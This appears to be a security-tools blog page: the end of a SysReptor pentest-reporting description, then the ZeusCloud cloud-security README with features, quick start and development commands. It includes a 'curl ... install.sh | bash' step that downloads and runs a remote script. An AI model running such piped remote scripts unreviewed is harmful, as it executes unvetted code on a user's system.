    Write in markdown
    Design in HTML/VueJS
    Render your report to PDF
    Fully customizable
    Self-hosted or Cloud
    No need for Word

    SysReptor Cloud

    You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

    οš€
    Sign up here


    SysReptor Self-Hosted

    You prefer self-hosting? That's fine! You will need:

    • Ubuntu
    • Latest Docker (with docker-compose-plugin)

    You can then install SysReptor with via script:

    curl -s https://docs.sysreptor.com/install.sh | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.





    ZeusCloud - Open Source Cloud Security

    By: Zion3R


    ZeusCloud is an open source cloud security platform.

    Discover, prioritize, and remediate your risks in the cloud.

    • Build an asset inventory of your AWS accounts.
    • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
    • Prioritize findings with graphical context.
    • Remediate findings with step by step instructions.
    • Customize security and compliance controls to fit your needs.
    • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

    Quick Start

    1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
    2. Run: cd ZeusCloud && make quick-deploy
    3. Visit http://localhost:80

    Check out our Get Started guide for more details.

    A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

    Sandbox

    Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

    Features

    • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
    • Graphical Context - Understand context behind security findings with graphical visualizations.
    • Access Explorer - Visualize who has access to what with an IAM visualization engine.
    • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
    • Configurability - Configure which security rules are active, which alerts should be muted, and more.
    • Security as Code - Modify rules or write your own with our extensible security as code approach.
    • Remediation - Follow step by step guides to remediate security findings.
    • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

    Why ZeusCloud?

    Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

    We had to take action.

    • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
    • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
    • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
    • Best of all, you can use ZeusCloud for free!

    Future Roadmap

    • Integrations with vulnerability scanners
    • Integrations with secret scanners
    • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
    • Support for Azure and GCP environments

    Contributing

    We love contributions of all sizes. What would be most helpful first:

    • Please give us feedback in our Slack.
    • Open a PR (see our instructions below on developing ZeusCloud locally)
    • Submit a feature request or bug report through Github Issues.

    Development

    Run containers in development mode:

    cd frontend && yarn && cd -
    docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

    Reset neo4j and/or postgres data with the following:

    rm -rf .compose/neo4j
    rm -rf .compose/postgres

    To develop on frontend, make the the code changes and save.

    To develop on backend, run

    docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

    To access the UI, go to: http://localhost:80.

    Security

    Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

    Open-source vs. cloud-hosted

    This repo is freely available under the Apache 2.0 license.

    We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

    Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



    ❌